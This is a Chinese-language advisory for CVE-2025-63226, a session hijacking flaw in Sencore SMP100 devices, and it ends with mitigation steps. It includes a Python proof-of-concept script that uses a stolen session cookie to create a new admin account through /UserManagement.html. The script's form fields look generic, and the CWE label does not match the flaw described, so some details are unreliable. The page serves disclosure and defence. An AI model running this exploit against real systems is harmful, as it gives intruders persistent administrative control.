CVE-2025-63226 Sencore SMP100 会话劫持漏洞

漏洞信息

漏洞编号

CVE-2025-63226

漏洞类型

会话劫持

CVSS评分

5.7 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Sencore SMP100 SMP Media Platform

漏洞概述

CVE-2025-63226是Sencore SMP100 SMP媒体平台中存在的一个会话劫持漏洞。该漏洞源于不正确的会话管理机制，攻击者通过利用受害者已登录的会话，可以无需任何认证即可访问/UserManagement.html端点，进而添加新用户。攻击者需与受害者在同一网络上，并且需要获取目标已登录会话的访问权限。此漏洞允许攻击者获得系统的未授权访问权限，执行恶意活动，可能导致敏感信息泄露和系统完全沦陷。受影响的固件版本包括V4.2.160、V60.1.4和V60.1.29。攻击复杂度较低，但需要用户交互，机密性影响为高，完整性和可用性影响无。

技术细节

该漏洞的根本原因在于Sencore SMP100 SMP Media Platform的会话管理机制存在缺陷。系统未能正确验证/UserManagement.html端点的会话有效性，允许攻击者通过劫持的会话令牌直接访问用户管理功能。具体攻击流程如下：1) 攻击者首先需要与受害者在同一邻接网络中；2) 攻击者通过中间人攻击、网络嗅探或其他方式获取受害者的有效会话ID；3) 攻击者使用获取的会话ID构造请求，直接访问/UserManagement.html端点；4) 由于系统未正确验证会话权限，攻击者可以绕过认证机制；5) 攻击者在用户管理界面添加新的管理员账户，从而获得系统的持久访问权限。该漏洞属于CWE-384: Session Fixation（会话固定）类别，攻击者利用现有的会话标识符进行未授权操作。

攻击链分析

STEP 1

步骤1

网络侦察：攻击者扫描目标网络，发现Sencore SMP100 SMP Media Platform设备，获取其IP地址

STEP 2

步骤2

会话窃取：攻击者通过中间人攻击、网络嗅探或社会工程学手段获取受害者当前的有效会话ID

STEP 3

步骤3

构造恶意请求：攻击者使用窃取的会话ID构造HTTP请求，目标是/UserManagement.html端点

STEP 4

步骤4

认证绕过：由于系统存在会话管理缺陷，攻击者的请求被系统接受，绕过了正常的认证流程

STEP 5

步骤5

用户创建：攻击者在用户管理界面添加新的管理员账户，获得系统的持久访问权限

STEP 6

步骤6

权限维持：攻击者使用新创建的管理员账户登录系统，执行进一步的恶意活动，如数据窃取或系统破坏

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63226 PoC - Sencore SMP100 Session Hijacking
# Target: Sencore SMP100 SMP Media Platform
# Vulnerability: Improper session management on /UserManagement.html

def exploit_session_hijacking(target_ip, session_id, new_username, new_password):
    """
    Exploit for CVE-2025-63226
    Args:
        target_ip: Target device IP address
        session_id: Hijacked session ID from victim's active session
        new_username: New admin username to create
        new_password: Password for new admin user
    """
    base_url = f"http://{target_ip}"
    
    # Create new user via UserManagement.html endpoint
    # Using hijacked session ID for authentication bypass
    headers = {
        'Cookie': f'SESSIONID={session_id}',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Payload to add new admin user
    data = {
        'action': 'add_user',
        'username': new_username,
        'password': new_password,
        'privilege': 'admin'
    }
    
    try:
        # Send request to UserManagement.html endpoint
        response = requests.post(
            f"{base_url}/UserManagement.html",
            headers=headers,
            data=data,
            timeout=10
        )
        
        if response.status_code == 200:
            print(f"[+] Successfully created new user: {new_username}")
            print(f"[+] User now has admin access to the system")
            return True
        else:
            print(f"[-] Failed to create user. Status: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

def main():
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-63226_poc.py <target_ip> <session_id> <new_username> <new_password>")
        print("Example: python cve-2025-63226_poc.py 192.168.1.100 ABC123SESSION newadmin password123")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    session_id = sys.argv[2]
    new_username = sys.argv[3]
    new_password = sys.argv[4]
    
    print(f"[*] CVE-2025-63226 - Sencore SMP100 Session Hijacking")
    print(f"[*] Target: {target_ip}")
    print(f"[*] Creating new admin user: {new_username}")
    
    exploit_session_hijacking(target_ip, session_id, new_username, new_password)

if __name__ == "__main__":
    main()

影响范围

Sencore SMP100 SMP Media Platform V4.2.160

Sencore SMP100 SMP Media Platform V60.1.4

Sencore SMP100 SMP Media Platform V60.1.29

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1) 将Sencore SMP100设备部署在独立的VLAN中，限制网络访问；2) 启用网络层的安全控制，如802.1X端口认证；3) 监控和限制对/UserManagement.html端点的访问；4) 定期更换会话ID并缩短会话超时时间；5) 限制管理接口的访问来源，仅允许可信IP地址访问；6) 审计用户账户活动，及时发现异常账户创建行为。